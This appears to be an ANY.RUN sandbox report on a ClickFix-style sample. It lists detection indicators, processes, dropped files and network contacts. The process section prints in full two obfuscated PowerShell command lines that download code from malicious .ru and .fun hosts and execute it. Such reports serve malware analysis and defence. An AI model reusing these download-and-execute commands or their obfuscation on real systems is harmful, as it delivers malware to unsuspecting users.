File name:

temp.txt

Full analysis: https://app.any.run/tasks/f22ebae6-e01a-4021-85e9-0297b3893d9c
Verdict: Malicious activity
Analysis date: April 23, 2025, 05:11:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
clickfix
Indicators:
MIME: application/octet-stream
File info: very short file (no magic)
MD5:

CFCD208495D565EF66E7DFF9F98764DA

SHA1:

B6589FC6AB0DC82CF12099D1C2D40AB994E8410C

SHA256:

5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9

SSDEEP:

3:V:V

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 4040)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5008)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 5008)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 4040)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 4040)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5008)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 4040)

  • INFO

    • Execution of CURL command

      • powershell.exe (PID: 6700)

    • Reads the computer name

      • curl.exe (PID: 6724)

    • Checks supported languages

      • curl.exe (PID: 6724)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4040)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 4040)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6700)
      • powershell.exe (PID: 5008)

    • Disables trace logs

      • powershell.exe (PID: 5008)

    • Checks proxy server information

      • powershell.exe (PID: 5008)
      • slui.exe (PID: 680)

    • Reads the software policy settings

      • slui.exe (PID: 4164)
      • slui.exe (PID: 680)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe curl.exe powershell.exe no specs svchost.exe powershell.exe conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
680C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2516C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
4040"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
4164"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5008"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C SI Variable:/sM 'https://mt.dybep.fun/gna2_runner';SV l2 (((([Net.WebClient]::New()|Member)|Where{(Variable _).Value.Name -clike'*wn*d*g'}).Name));Set-Item Variable:2 ([Net.WebClient]::New());&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{(Variable _).Value.Name -clike'*d'}).Name)($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where{(Variable _).Value.Name -clike'*Com*e'}).Name)('*e-*press*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(Variable 2 -Valu).((GCI Variable:\l2).Value)((Get-Variable sM -ValueOnl)) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
6032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6700"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w Minimized -c cUr"L.E"x"E" -k -L --"re"try 9"9"9 http"s://hast"i"ly"bak"es"h"o"p.ru"/"1"3"0"6"5"3"65"f"51d"88a4"fb0c0d"ab"4e"9d"f858.txt | pow"e"rs"h"el"l" -;" This Node Is Yours : 2025C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6724"C:\WINDOWS\system32\curl.exe" -k -L --retry 999 https://hastilybakeshop.ru/13065365f51d88a4fb0c0dab4e9df858.txtC:\Windows\System32\curl.exe
powershell.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
7084\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 837
Read events
17 837
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
6700powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E44F9E8F6D302663F7C9456514FEFD25
SHA256:DCDCAD52AEF15224EC5E1238B8CEC75328C0B64CB5E0DDB329938392B624E053
6700powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1XRQO5BCW92U1CVXA68.tempbinary
MD5:E44F9E8F6D302663F7C9456514FEFD25
SHA256:DCDCAD52AEF15224EC5E1238B8CEC75328C0B64CB5E0DDB329938392B624E053
6700powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10b538.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6700powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fsbq1mzh.iul.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4040powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:39059463D54F4508B1654E78002F0416
SHA256:3ABE4BFBD32A1AC36B41A7DE6D228889514DD3FB86A1CA89AFA817B8853144ED
6700powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tvu00law.die.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kar3jta1.las.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6700powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jq04if0d.3gg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5008powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yizvcwdl.vz4.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wpolmsnd.nsf.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
24
DNS requests
18
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.164:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3156
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
3156
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.164:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
6724
curl.exe
188.114.96.3:443
hastilybakeshop.ru
CLOUDFLARENET
NL
unknown
2112
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.32.138:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 172.217.16.206
whitelisted
crl.microsoft.com
  • 23.48.23.164
  • 23.48.23.147
  • 23.48.23.177
  • 23.48.23.194
  • 23.48.23.176
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 2.23.246.101
whitelisted
hastilybakeshop.ru
  • 188.114.96.3
  • 188.114.97.3
unknown
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.32.138
  • 40.126.32.136
  • 20.190.160.17
  • 20.190.160.14
  • 20.190.160.64
  • 20.190.160.22
  • 20.190.160.2
  • 40.126.32.133
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
mt.dybep.fun
  • 172.67.219.133
  • 104.21.45.223
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (hastilybakeshop .ru)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
temp.txt